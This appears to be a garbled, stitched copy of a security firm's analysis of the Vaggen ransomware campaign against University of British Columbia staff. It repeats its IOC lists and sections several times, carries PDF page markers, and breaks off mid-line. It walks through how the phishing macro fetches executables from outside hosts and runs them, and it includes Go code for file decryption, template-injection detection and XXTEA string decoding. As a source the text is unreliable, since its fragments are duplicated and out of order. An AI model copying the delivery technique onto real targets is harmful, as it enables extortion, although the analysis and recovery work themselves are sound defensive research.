notabug[.]org/arstidar/VARLDVINNA/raw/master/irving.exe
notabug[.]org/arstidar/VARLDVINNA/raw/master/alderson.exe
canarytokens[.]com/traffic/jnk5rpagi54vztro6tau6g1v6/index.html
canarytokens[.]com/traffic/articles/tags/z8yobwprmmopmyfyw8sb1fb0a/index.html
alderson.exe
b4a1a0012abde1ae68f50fa1fe53df7a5d933ec5410731622ab0ad505915cfb6
irving.exe
00c60593dfdc9bbb8b345404586dcf7197c06c7a92dad72dde2808c8cc66c6fe

Variant5:
template.dotm
7ad8a3c438f36cdfc5928e9f3c7c052463b5987055f583ff716d0382d0eb23b4
notabug[.]org/Microsoft-Office/Office-Templates/raw/master/mrclean.exe
notabug[.]org/Microsoft-Office/Office-Templates/raw/master/mrmonster.exe
canarytokens[.]com/images/feedback/tags/0xu6dnwmpc1k1j2i3nec3fq2b/post.jsp
canarytokens[.]com/traffic/about/images/ff6x6licr69lmjva84rn65hao/contact.php
mrmonster.exe
f42bbb178e86dc3449662b5fe4c331e3489de01277f00a56add12501bf8e6c23
mrclean.exe
71aadf3c1744f919cddcc157ff5247b1af2e2211b567e1eee2769973b2f7332a
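File recovery as the Vaggen section above describes it, as an added example (not the malware's code and not a Malwarebytes tool): SealVaggen reproduces the nonce || ciphertext || tag layout with gcm.Seal so the format can be exercised offline, OpenVaggen recovers the plaintext under the hardcoded key, and RecoverFile applies it to a .VAGGEN file on disk. The function names are chosen here, the nonce comes from Go's crypto/rand rather than CryptGenRandom, and the key is only known to be valid for the sample analysed in the write-up.

```go
package main

import (
	"crypto/aes"
	"crypto/cipher"
	"crypto/rand"
	"errors"
	"fmt"
	"io"
	"os"
	"strings"
)

// vaggenKey is the key the write-up recovered from the analysed sample; it is
// 32 bytes, hence AES-256. Another build could embed a different key.
const vaggenKey = "du_tar_mitt_hjart_mina_pengarna0"

func newGCM(key []byte) (cipher.AEAD, error) {
	block, err := aes.NewCipher(key) // AES-256 for a 32-byte key
	if err != nil {
		return nil, err
	}
	return cipher.NewGCM(block) // 12-byte nonce, 16-byte tag by default
}

// SealVaggen mimics the scheme the report attributes to the malware: a fresh
// random nonce passed to gcm.Seal as the output prefix. Seal appends the tag,
// so the result is nonce || ciphertext || tag, the .VAGGEN layout described.
func SealVaggen(key, plaintext []byte) ([]byte, error) {
	gcm, err := newGCM(key)
	if err != nil {
		return nil, err
	}
	nonce := make([]byte, gcm.NonceSize())
	if _, err := io.ReadFull(rand.Reader, nonce); err != nil {
		return nil, err
	}
	return gcm.Seal(nonce, nonce, plaintext, nil), nil
}

// OpenVaggen recovers the plaintext. GCM authenticates, so a wrong key or a
// truncated or tampered file fails closed instead of producing garbage.
func OpenVaggen(key, blob []byte) ([]byte, error) {
	gcm, err := newGCM(key)
	if err != nil {
		return nil, err
	}
	ns := gcm.NonceSize()
	if len(blob) < ns+gcm.Overhead() {
		return nil, errors.New("file too short to hold a nonce and a GCM tag")
	}
	return gcm.Open(nil, blob[:ns], blob[ns:], nil)
}

// RecoverFile decrypts name (which must end in .VAGGEN) to the original name.
// The encrypted copy is left in place so nothing is lost if Open fails.
func RecoverFile(name string) (string, error) {
	if !strings.HasSuffix(name, ".VAGGEN") {
		return "", fmt.Errorf("%s: not a .VAGGEN file", name)
	}
	blob, err := os.ReadFile(name)
	if err != nil {
		return "", err
	}
	plain, err := OpenVaggen([]byte(vaggenKey), blob)
	if err != nil {
		return "", fmt.Errorf("%s: %w", name, err)
	}
	out := strings.TrimSuffix(name, ".VAGGEN")
	if err := os.WriteFile(out, plain, 0o600); err != nil {
		return "", err
	}
	return out, nil
}

func main() {
	for _, name := range os.Args[1:] {
		out, err := RecoverFile(name)
		if err != nil {
			fmt.Fprintln(os.Stderr, err)
			continue
		}
		fmt.Println("recovered", out)
	}
}
```

Build it and pass .VAGGEN paths on the command line. Because GCM verifies the tag before releasing any plaintext, a wrong key, a different build's key or a damaged file produces an error rather than a corrupt output file; keep the .VAGGEN copies until the recovered files have been checked.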
Using a hardcoded key and 12 bytes long nonce,\r\ngenerated by CryptGenRandom. The file content is encrypted with the help of the gcm.Seal function.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 1348 of 3467\n\nThe content of the output file (with .VAGGEN extension) contains:\r\nthe 12 bytes long nonce\r\nthe encrypted content\r\nthe 16 byte long GCM Tag\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 1349 of 3467\n\nThe hardcoded key “du_tar_mitt_hjart_mina_pengarna0” found inside the malware code is Swedish for “you take\r\nmy heart my money”. Using this key, we can easily decrypt the content.\r\nWith all these elements, we can actually recover encrypted files without having to pay the ransom. It appears that\r\nthe malware author has not received any payment so far at this Bitcoin address.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 1350 of 3467\n\nUnusually low ransom amount\r\nBased on our findings, we believe this is not a sophisticated threat actor, nor affiliated with any of the big\r\nransomware gangs such as Ryuk. The ransom amount is unusually low, and unlike professional ransomware, this\r\nattack can be recovered from fairly easy.\r\nHowever, the phishing attack was well conceived and the template looks well designed, with a nice touch of\r\nadding canary tokens. It’s unclear at this point if the University of British Columbia was the sole target or not.\r\nCrawling additional repositories created by the threat actor, we found other Word template files that have used a\r\nvery similar macro to drop a coin miner. This casts more questions about the motivation behind this phishing\r\nattack.\r\nWe are grateful for the information shared with us by the University of British Columbia. 
This allowed us to paint\r\na better picture of this attack and understand who the targets were.\r\nMalwarebytes customers were already protected thanks to our signature-less Anti-Exploit layer.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 1351 of 3467\n\nIOCs\r\nVariant1:\r\nsummerofficetemplate.dotm\r\n634264996c0d27b71a5b63fb87042e29660de7ae8f18fcc27b97ab86cb92b6d4\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/irving.exe\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/alderson.exe\r\ncanarytokens[.]com/traffic/jnk5rpagi54vztro6tau6g1v6/index.html\r\ncanarytokens[.]com/traffic/articles/tags/z8yobwprmmopmyfyw8sb1fb0a/index.html\r\nalderson.exe\r\n34842eff9870ea15ce3b3f3ec8d80c6fd6a22f65b6bae187d8eca014f11aafa5\r\nirving.exe\r\n00c60593dfdc9bbb8b345404586dcf7197c06c7a92dad72dde2808c8cc66c6fe\r\nVariant2:\r\nUBC-COVID19-Survey-Mandatory.docx\r\ne869e306c532aaf348725d94c1d5da656228d316071dede76be8fcd7384391c3\r\ntemplate.dotm\r\n334531228a447e4dfd427b08db228c62369461bb2ccde9ab1315649efd0316b1\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/polisen.exe\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/killar.exe\r\ncanarytokens[.]com/about/d4yeyvldfg6bn5y29by4e9fs3/post.jsp\r\ncanarytokens[.]com/articles/6dbbnd503z06qitej1sdzzcvv/index.html\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 1352 of 
3467\n\npolisen.exe\r\n03420a335457e352e614dd511f8b03a7a8af600ca67970549d4f27543a151bcf\r\nkillar.exe\r\n43c222eea7f1e367757e587b13bf17019f29bd61c07d20cbee14c4d66d43a71f\r\nVariant3:\r\ntemplate1.dotm\r\n225e19abba17f70df00562e89a5d4ad5e3818e40fd4241120a352aba344074f4\r\nnotabug[.]org/Microsoft-Templates/Template/raw/master/irving.exe\r\nnotabug[.]org/Microsoft-Templates/Template/raw/master/alderson.exe\r\ncanarytokens[.]com/images/tags/8pkmk2o11dmp1xjv5i9svji32/contact.php\r\ncanarytokens[.]com/articles/traffic/5ayx8tydzeuzhmq6y5u2lxhpa/post.jsp\r\nVariant4:\r\nsmoothtemplates.dotm\r\nada43ee41f70e327944121217473c536024cd9c90e25088a1a6c5cf895f59fe1\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/irving.exe\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/alderson.exe\r\ncanarytokens[.]com/traffic/jnk5rpagi54vztro6tau6g1v6/index.html\r\ncanarytokens[.]com/traffic/articles/tags/z8yobwprmmopmyfyw8sb1fb0a/index.html\r\nalderson.exe\r\nb4a1a0012abde1ae68f50fa1fe53df7a5d933ec5410731622ab0ad505915cfb6\r\nirving.exe\r\n00c60593dfdc9bbb8b345404586dcf7197c06c7a92dad72dde2808c8cc66c6fe\r\nVariant5:\r\ntemplate.dotm:\r\n7ad8a3c438f36cdfc5928e9f3c7c052463b5987055f583ff716d0382d0eb23b4\r\nnotabug[.]org/Microsoft-Office/Office-Templates/raw/master/mrclean.exe\r\nnotabug[.]org/Microsoft-Office/Office-Templates/raw/master/mrmonster.exe\r\ncanarytokens[.]com/images/feedback/tags/0xu6dnwmpc1k1j2i3nec3fq2b/post.jsp\r\ncanarytokens[.]com/traffic/about/images/ff6x6licr69lmjva84rn65hao/contact.php\r\nmrmonster.exe\r\nf42bbb178e86dc3449662b5fe4c331e3489de01277f00a56add12501bf8e6c23\r\nmrclean.exe\r\n71aadf3c1744f919cddcc157ff5247b1af2e2211b567e1eee2769973b2f7332a\r\nThis post was authored by Jérôme Segura with contributions from Hossein Jazi, Hasherezade and Marcelo Rivero.\r\nIn recent weeks, we’ve observed a number of phishing attacks against universities worldwide which we attributed\r\nto the Silent Librarian APT group. 
On October 19, we identified a new phishing document targeting staff at the University of British Columbia (UBC) with a fake COVID-19 survey.\r\nHowever, this attack and its motives differ from the ones previously documented. The survey is a malicious Word document whose purpose is to download ransomware and extort victims into paying to recover their encrypted files.\r\nOn discovery, we got in touch with UBC to report our findings. They were already aware of this phishing campaign and were kind enough to share more information with us about the incident. Ultimately, the attack was not successful, thanks to the rapid response of the UBC cybersecurity team.\r\nMandatory COVID-19 survey distributed to targeted recipients\r\nThe attacker created an email address with the mailpoof.com service in order to register accounts with Box.net and Dropbox. Rather than sending the fake survey directly via email, the attacker uploaded the document to Box and Dropbox and used the share functionality of these platforms to distribute it.\r\nThis was probably done to evade spam and phishing filters that would have blocked messages coming from a newly registered email address with a low reputation. By comparison, it is much harder to detect spam sent through file sharing services without generating a number of false positives.\r\nThe attacker claimed to be a manager and added the following comment to the file sharing invitation (shared with us by UBC):\r\nGood evening gals and guys! [redacted] here, [redacted] manager for [redacted]. I am sharing a mandatory survey with you that must be completed by Monday. It asks a few questions about how you believe our company responded to the pandemic regarding remote working and much more. 
Please fill it out ASAP!\r\nYou will also find a form at the end that you can fill out if you need any necessities! Necessities include: gloves, hand sanitizer, masks, or disinfectant spray. We will be providing it to those employees who fill out the form for free! Simply sign your initials and put what you need as well as the quantity!\r\nIn advance, we appreciate your feedback! Thanks all! Stay strong! I understand times like this can be difficult!\r\nAccording to UBC, fewer than a hundred people within a specific department received the link to access the shared document. A Box or Dropbox account was required to download the file, since it was shared privately rather than publicly. This may have been an effort to evade detection, or perhaps the attacker expected the target organization to already be using one of these two sharing services.\r\nPhishing document analysis\r\nThe phishing document uses template injection to download and execute a remote template (template.dotm) weaponized with a malicious macro. 
That file was uploaded to a free code hosting website (notabug.org).\r\nWhen the macro is executed, it does the following:\r\nGets the %APPDATA% directory\r\nCreates the Byxor directory in %APPDATA%\r\nDownloads a file from the following URL and writes it as Polisen.exe:\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/polisen.exe\r\nDownloads a file from the following URL and writes it as Killar.exe:\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/killar.exe\r\nCalls the VBA Shell function to execute killar.exe\r\nChecks the return value of that Shell call to see whether the launch succeeded (on success, Shell returns the task ID of the started program)\r\nIf successful, it sends an HTTP GET request to:\r\ncanarytokens[.]com/about/d4yeyvldfg6bn5y29by4e9fs3/post.jsp\r\nIf it isn’t successful, it sends an HTTP GET request to:\r\ncanarytokens[.]com/articles/6dbbnd503z06qitej1sdzzcvv/index.html\r\nWe were able to identify four other variants of the remote templates and payloads. In some of the folders, we found several artifacts using Swedish words, which could indicate that the threat actor is familiar with the language.\r\nOpening the phishing document triggers a notification via the canarytokens.com website. Typically, people use this type of service to get alerted on a particular event; it can be very useful as an early warning that an intruder has gained access to a network. 
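Because the .docx itself carries no macro, the quickest triage is to look at how the document attaches its template: Word records the attached template as a relationship in word/_rels/settings.xml.rels, and when that relationship is External with an http(s) Target, Word fetches and applies the remote template (here template.dotm with its macro) when the file is opened. The Go program below is an added example, not code from the Malwarebytes analysis or from the campaign: it builds a constructed .docx with such a relationship, plus a benign one, and scans both. The placeholder URL attacker.invalid and the sample document content are assumptions, not the campaign's real notabug.org path.

```go
package main

import (
	"archive/zip"
	"bytes"
	"encoding/xml"
	"fmt"
	"path"
	"strings"
)

// relationship mirrors one <Relationship> element of an OPC .rels part.
type relationship struct {
	ID         string `xml:"Id,attr"`
	Type       string `xml:"Type,attr"`
	Target     string `xml:"Target,attr"`
	TargetMode string `xml:"TargetMode,attr"`
}

type relationships struct {
	XMLName xml.Name       `xml:"Relationships"`
	Rels    []relationship `xml:"Relationship"`
}

// findRemoteTemplates parses every .rels part in the package and reports
// external relationships that attach a template (the injection primitive) or
// pull any other non-hyperlink part from an http(s) URL.
func findRemoteTemplates(doc []byte) ([]string, error) {
	zr, err := zip.NewReader(bytes.NewReader(doc), int64(len(doc)))
	if err != nil {
		return nil, err
	}
	var hits []string
	for _, f := range zr.File {
		if !strings.HasSuffix(f.Name, ".rels") {
			continue
		}
		rc, err := f.Open()
		if err != nil {
			return nil, err
		}
		var rels relationships
		err = xml.NewDecoder(rc).Decode(&rels)
		rc.Close()
		if err != nil {
			return nil, fmt.Errorf("%s: %w", f.Name, err)
		}
		for _, r := range rels.Rels {
			if !strings.EqualFold(r.TargetMode, "External") {
				continue // parts stored inside the zip are normal
			}
			kind := path.Base(r.Type) // attachedTemplate, hyperlink, oleObject, ...
			target := strings.ToLower(r.Target)
			remote := strings.HasPrefix(target, "http://") || strings.HasPrefix(target, "https://")
			if kind == "attachedTemplate" || (remote && kind != "hyperlink") {
				hits = append(hits, fmt.Sprintf("%s: %s %s -> %s", f.Name, r.ID, kind, r.Target))
			}
		}
	}
	return hits, nil
}

// makeSampleDocx builds a minimal, constructed .docx in memory. With external
// set, the attached-template relationship points at target the way a
// template-injection document does; otherwise it names a local template.
func makeSampleDocx(target string, external bool) []byte {
	mode := ""
	if external {
		mode = ` TargetMode="External"`
	}
	parts := map[string]string{
		"[Content_Types].xml":          `<Types xmlns="http://schemas.openxmlformats.org/package/2006/content-types"/>`,
		"word/document.xml":            `<w:document xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main"><w:body><w:p><w:r><w:t>COVID-19 survey</w:t></w:r></w:p></w:body></w:document>`,
		"word/settings.xml":            `<w:settings xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships"><w:attachedTemplate r:id="rId1"/></w:settings>`,
		"word/_rels/settings.xml.rels": `<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/attachedTemplate" Target="` + target + `"` + mode + `/></Relationships>`,
	}
	var buf bytes.Buffer
	zw := zip.NewWriter(&buf)
	for name, body := range parts {
		w, err := zw.Create(name)
		if err != nil {
			panic(err)
		}
		fmt.Fprint(w, body)
	}
	zw.Close()
	return buf.Bytes()
}

func main() {
	// Placeholder URL (constructed); the real campaign hosted template.dotm on notabug.org.
	hits, err := findRemoteTemplates(makeSampleDocx("http://attacker.invalid/raw/master/template.dotm", true))
	if err != nil {
		panic(err)
	}
	for _, h := range hits {
		fmt.Println("remote template:", h)
	}
	benign, _ := findRemoteTemplates(makeSampleDocx("Normal.dotm", false))
	fmt.Println("benign document hits:", len(benign))
}
```

To run it against a real file, pass the bytes from os.ReadFile to findRemoteTemplates. A hit in word/_rels/settings.xml.rels with kind attachedTemplate and an http(s) target is the template-injection signature; an external oleObject target deserves the same attention, while external hyperlinks are ordinary and are skipped.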
In this campaign, the canary token most likely tells the attacker how many people opened the document and perhaps where they are from.\r\nVaggen ransomware\r\nAfter being deployed, the ransomware starts encrypting the user’s files and adds the .VAGGEN extension to them. When the encryption process is finished, it drops a ransom note on the Desktop, demanding a payment equivalent to 80 USD in Bitcoin.\r\nThe ransomware appears to be coded from scratch and is a relatively straightforward application written in Go, whose entry point is the function denoted as ‘main_main’.\r\nOther functions belonging to the main application have obfuscated names, such as: main_FOLOJVAG, main_DUVETVAD, main_ELDBJORT, main_HIDDENBERRIES, main_LAMNARDETTA, main_SPRINGA. From their behaviour, some can be given descriptive names:\r\nmain_LAMNARDETTA -> main_enumDir\r\nmain_ELDBJORT -> main_encryptFile\r\nmain_SPRINGA -> main_encryptAndRen\r\nA full list of the functions, along with their RVAs, can be found here.\r\nSome of the strings used by the malware (i.e. the content of the ransom note) are encrypted with XXTEA (using the xxtea-go library). Encrypted chunks are first decoded from Base64, and the XXTEA key is hardcoded (“STALKER”). At the end of the execution, the ransom note is dropped on the Desktop.\r\nEncrypting and renaming the files is implemented as the callback passed to the standard Go function path/filepath.Walk, which visits every file under the chosen directory tree.\r\nFiles are encrypted with AES-256 (32 byte long key) in GCM mode.\r\nThe encryption algorithm is similar to the one demonstrated here. 
It uses the hardcoded key and a 12-byte nonce generated by CryptGenRandom; the file content is encrypted with the gcm.Seal function.\r\nThe output file (with the .VAGGEN extension) contains:\r\nthe 12-byte nonce\r\nthe encrypted content\r\nthe 16-byte GCM tag\r\nThe hardcoded key “du_tar_mitt_hjart_mina_pengarna0” found inside the malware code is Swedish for “you take my heart my money”. Using this key, we can easily decrypt the content: because the key is embedded in the binary and the nonce is stored in the file, nothing held by the attacker is needed, and since GCM authenticates what it decrypts, a wrong key or a damaged file fails the tag check instead of yielding garbage.\r\nWith all these elements, we can recover encrypted files without having to pay the ransom. It appears that the malware author has not received any payment so far at this Bitcoin address.\r\nUnusually low ransom amount\r\nBased on our findings, we believe this is not a sophisticated threat actor, nor one affiliated with any of the big ransomware gangs such as Ryuk. The ransom amount is unusually low, and unlike professional ransomware, this attack can be recovered from fairly easily.\r\nHowever, the phishing attack was well conceived and the template looks well designed, with a nice touch of adding canary tokens. It’s unclear at this point whether the University of British Columbia was the sole target.\r\nCrawling additional repositories created by the threat actor, we found other Word template files that used a very similar macro to drop a coin miner. This raises more questions about the motivation behind this phishing attack.\r\nWe are grateful for the information shared with us by the University of British Columbia. 
This allowed us to paint a better picture of this attack and understand who the targets were.\r\nMalwarebytes customers were already protected thanks to our signature-less Anti-Exploit layer.\r\nIOCs\r\nVariant1:\r\nsummerofficetemplate.dotm\r\n634264996c0d27b71a5b63fb87042e29660de7ae8f18fcc27b97ab86cb92b6d4\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/irving.exe\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/alderson.exe\r\ncanarytokens[.]com/traffic/jnk5rpagi54vztro6tau6g1v6/index.html\r\ncanarytokens[.]com/traffic/articles/tags/z8yobwprmmopmyfyw8sb1fb0a/index.html\r\nalderson.exe\r\n34842eff9870ea15ce3b3f3ec8d80c6fd6a22f65b6bae187d8eca014f11aafa5\r\nirving.exe\r\n00c60593dfdc9bbb8b345404586dcf7197c06c7a92dad72dde2808c8cc66c6fe\r\nVariant2:\r\nUBC-COVID19-Survey-Mandatory.docx\r\ne869e306c532aaf348725d94c1d5da656228d316071dede76be8fcd7384391c3\r\ntemplate.dotm\r\n334531228a447e4dfd427b08db228c62369461bb2ccde9ab1315649efd0316b1\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/polisen.exe\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/killar.exe\r\ncanarytokens[.]com/about/d4yeyvldfg6bn5y29by4e9fs3/post.jsp\r\ncanarytokens[.]com/articles/6dbbnd503z06qitej1sdzzcvv/index.html\r\npolisen.exe\r\n03420a335457e352e614dd511f8b03a7a8af600ca67970549d4f27543a151bcf\r\nkillar.exe\r\n43c222eea7f1e367757e587b13bf17019f29bd61c07d20cbee14c4d66d43a71f\r\nVariant3:\r\ntemplate1.dotm\r\n225e19abba17f70df00562e89a5d4ad5e3818e40fd4241120a352aba344074f4\r\nnotabug[.]org/Microsoft-Templates/Template/raw/master/irving.exe\r\nnotabug[.]org/Microsoft-Templates/Template/raw/master/alderson.exe\r\ncanarytokens[.]com/images/tags/8pkmk2o11dmp1xjv5i9svji32/contact.php\r\ncanarytokens[.]com/articles/traffic/5ayx8tydzeuzhmq6y5u2lxhpa/post.jsp\r\nVariant4:\r\nsmoothtemplates.dotm\r\nada43ee41f70e327944121217473c536024cd9c90e25088a1a6c5cf895f59fe1\r\nnotabug[.]org/arstidar/V

ARLDVINNA/raw/master/irving.exe\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/alderson.exe\r\ncanarytokens[.]com/traffic/jnk5rpagi54vztro6tau6g1v6/index.html\r\ncanarytokens[.]com/traffic/articles/tags/z8yobwprmmopmyfyw8sb1fb0a/index.html\r\nalderson.exe\r\nb4a1a0012abde1ae68f50fa1fe53df7a5d933ec5410731622ab0ad505915cfb6\r\nirving.exe\r\n00c60593dfdc9bbb8b345404586dcf7197c06c7a92dad72dde2808c8cc66c6fe\r\nVariant5:\r\ntemplate.dotm\r\n7ad8a3c438f36cdfc5928e9f3c7c052463b5987055f583ff716d0382d0eb23b4\r\nnotabug[.]org/Microsoft-Office/Office-Templates/raw/master/mrclean.exe\r\nnotabug[.]org/Microsoft-Office/Office-Templates/raw/master/mrmonster.exe\r\ncanarytokens[.]com/images/feedback/tags/0xu6dnwmpc1k1j2i3nec3fq2b/post.jsp\r\ncanarytokens[.]com/traffic/about/images/ff6x6licr69lmjva84rn65hao/contact.php\r\nmrmonster.exe\r\nf42bbb178e86dc3449662b5fe4c331e3489de01277f00a56add12501bf8e6c23\r\nmrclean.exe\r\n71aadf3c1744f919cddcc157ff5247b1af2e2211b567e1eee2769973b2f7332a\r\n
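The string protection described in the Vaggen ransomware section above (Base64, then XXTEA with the hardcoded key “STALKER”) can be undone with a little Go. The program below is an added example, not the malware's code and not from the Malwarebytes analysis. It assumes the byte conventions of the xxtea-go library the analysis names: little-endian 32-bit words, the plaintext length appended as a trailing word, and short keys zero-padded to 16 bytes. That reading of the library, the placeholder note text, and the encryptString helper (which only builds test input in the same format) are my additions.

```go
package main

import (
	"encoding/base64"
	"encoding/binary"
	"errors"
	"fmt"
)

const delta = 0x9e3779b9

// Hardcoded string key from the sample, padded to four words as xxtea-go does.
var stringKey = xxteaKey("STALKER")

func xxteaKey(s string) (k [4]uint32) {
	copy(k[:], toWords([]byte(s), false)) // bytes beyond the key stay zero
	return
}

// toWords packs bytes into little-endian words (zero-padded tail) and, when
// withLen is set, appends the byte length as a trailing word.
func toWords(b []byte, withLen bool) []uint32 {
	w := make([]uint32, (len(b)+3)/4, (len(b)+3)/4+1)
	for i, c := range b {
		w[i/4] |= uint32(c) << (8 * uint(i%4))
	}
	if withLen {
		w = append(w, uint32(len(b)))
	}
	return w
}

func toBytes(w []uint32) []byte {
	out := make([]byte, len(w)*4)
	for i, x := range w {
		binary.LittleEndian.PutUint32(out[i*4:], x)
	}
	return out
}

// xxtea runs the Corrected Block TEA (btea) rounds over v in place.
func xxtea(v []uint32, k [4]uint32, decrypt bool) {
	n := uint32(len(v))
	if n < 2 {
		return
	}
	rounds := 6 + 52/n
	mx := func(sum, y, z, p uint32) uint32 {
		e := (sum >> 2) & 3
		return ((z>>5 ^ y<<2) + (y>>3 ^ z<<4)) ^ ((sum ^ y) + (k[(p&3)^e] ^ z))
	}
	if !decrypt {
		var sum uint32
		z := v[n-1]
		for ; rounds > 0; rounds-- {
			sum += delta
			for p := uint32(0); p < n-1; p++ {
				v[p] += mx(sum, v[p+1], z, p)
				z = v[p]
			}
			v[n-1] += mx(sum, v[0], z, n-1)
			z = v[n-1]
		}
		return
	}
	sum, y := rounds*delta, v[0]
	for ; rounds > 0; rounds-- {
		for p := n - 1; p > 0; p-- {
			v[p] -= mx(sum, y, v[p-1], p)
			y = v[p]
		}
		v[0] -= mx(sum, y, v[n-1], 0)
		y = v[0]
		sum -= delta
	}
}

// decryptString reverses the protection: Base64, XXTEA, then the trailing
// length word, which becomes implausible when the key is wrong.
func decryptString(b64 string) (string, error) {
	ct, err := base64.StdEncoding.DecodeString(b64)
	if err != nil || len(ct) < 8 || len(ct)%4 != 0 {
		return "", errors.New("xxtea: not Base64 of whole words plus a length word")
	}
	w := toWords(ct, false)
	xxtea(w, stringKey, true)
	body, n := toBytes(w[:len(w)-1]), int(w[len(w)-1])
	if n < 0 || n > len(body) || n < len(body)-3 {
		return "", errors.New("xxtea: bad length word (wrong key?)")
	}
	return string(body[:n]), nil
}

// encryptString builds input in the same format; it exists only for testing.
func encryptString(s string) string {
	w := toWords([]byte(s), true)
	xxtea(w, stringKey, false)
	return base64.StdEncoding.EncodeToString(toBytes(w))
}

func main() {
	sample := encryptString("Your files were encrypted. Pay 80 USD in Bitcoin.") // constructed note text
	fmt.Println(decryptString(sample))
}
```

Feed decryptString the Base64 blobs pulled from the binary's string table; the length-word check rejects most wrong-key or truncated inputs before any text is printed.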
The file content is encrypted with the help of the gcm.Seal function.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 1382 of 3467\n\nThe content of the output file (with .VAGGEN extension) contains:\r\nthe 12 bytes long nonce\r\nthe encrypted content\r\nthe 16 byte long GCM Tag\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 1383 of 3467\n\nThe hardcoded key “du_tar_mitt_hjart_mina_pengarna0” found inside the malware code is Swedish for “you take\r\nmy heart my money”. Using this key, we can easily decrypt the content.\r\nWith all these elements, we can actually recover encrypted files without having to pay the ransom. It appears that\r\nthe malware author has not received any payment so far at this Bitcoin address.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 1384 of 3467\n\nUnusually low ransom amount\r\nBased on our findings, we believe this is not a sophisticated threat actor, nor affiliated with any of the big\r\nransomware gangs such as Ryuk. The ransom amount is unusually low, and unlike professional ransomware, this\r\nattack can be recovered from fairly easy.\r\nHowever, the phishing attack was well conceived and the template looks well designed, with a nice touch of\r\nadding canary tokens. It’s unclear at this point if the University of British Columbia was the sole target or not.\r\nCrawling additional repositories created by the threat actor, we found other Word template files that have used a\r\nvery similar macro to drop a coin miner. This casts more questions about the motivation behind this phishing\r\nattack.\r\nWe are grateful for the information shared with us by the University of British Columbia. 
This allowed us to paint\r\na better picture of this attack and understand who the targets were.\r\nMalwarebytes customers were already protected thanks to our signature-less Anti-Exploit layer.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 1385 of 3467\n\nIOCs\r\nVariant1:\r\nsummerofficetemplate.dotm\r\n634264996c0d27b71a5b63fb87042e29660de7ae8f18fcc27b97ab86cb92b6d4\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/irving.exe\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/alderson.exe\r\ncanarytokens[.]com/traffic/jnk5rpagi54vztro6tau6g1v6/index.html\r\ncanarytokens[.]com/traffic/articles/tags/z8yobwprmmopmyfyw8sb1fb0a/index.html\r\nalderson.exe\r\n34842eff9870ea15ce3b3f3ec8d80c6fd6a22f65b6bae187d8eca014f11aafa5\r\nirving.exe\r\n00c60593dfdc9bbb8b345404586dcf7197c06c7a92dad72dde2808c8cc66c6fe\r\nVariant2:\r\nUBC-COVID19-Survey-Mandatory.docx\r\ne869e306c532aaf348725d94c1d5da656228d316071dede76be8fcd7384391c3\r\ntemplate.dotm\r\n334531228a447e4dfd427b08db228c62369461bb2ccde9ab1315649efd0316b1\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/polisen.exe\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/killar.exe\r\ncanarytokens[.]com/about/d4yeyvldfg6bn5y29by4e9fs3/post.jsp\r\ncanarytokens[.]com/articles/6dbbnd503z06qitej1sdzzcvv/index.html\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 1386 of 
